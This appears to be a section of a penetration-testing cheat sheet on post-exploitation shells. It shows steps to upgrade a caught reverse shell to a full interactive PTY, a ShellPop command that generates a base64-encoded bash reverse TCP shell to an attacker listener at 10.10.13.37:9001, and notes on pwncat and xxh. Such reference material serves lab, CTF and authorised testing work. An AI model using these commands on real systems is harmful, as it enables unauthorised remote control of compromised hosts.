Shells

Upgrade to PTY

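 # Spawn a PTY on the remote host (the initial shell has no TTY, so job control and full-screen programs do not work)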
$ if python3 -V > /dev/null 2>&1; then
  python3 -c 'import pty; pty.spawn("/bin/bash")'
elif python -V > /dev/null 2>&1; then
  python -c 'import pty; pty.spawn("/bin/bash")'
fi
Or
$ script -q /dev/null /bin/bash

 # Background remote shell
user@remote:~$ ^Z

 # Get rows and columns from the local terminal (note the values for the stty step below)
root@kali:~$ stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'

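 # Put the local terminal in raw mode with echo off, then bring the remote shell back to the foreground (run `reset` locally after the session ends to restore the terminal)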
root@kali:~$ stty raw -echo; fg

 # (optional) Reset remote terminal
user@remote:~$ reset

 # Set rows and columns (ROWS/COLS are the values read from the local terminal above) for proper text alignment
user@remote:~$ stty rows ${ROWS} cols ${COLS}

 # For CTRL-L (clear screen) to work; set TERM to one of the listed values
user@remote:~$ export TERM=xterm / xterm-color / xterm-256color

 # (optional) Replace the current shell with a new Bash process image (-l for a login shell)
user@remote:~$ exec /bin/bash [-l]

Tools

ShellPop

Bash reverse TCP example:

$ shellpop -H 10.10.13.37 -P 9001 --reverse --number 8 --base64

pwncat

xxh

$ pipx install xxh-xxh
$ source xxh.zsh -i id_rsa snovvcrash@192.168.1.11 +I xxh-plugin-zsh-ohmyzsh +if [+q/+vv]
$ ssh -i id_cthulhu snovvcrash@192.168.1.11 -f "rm -rf .xxh"
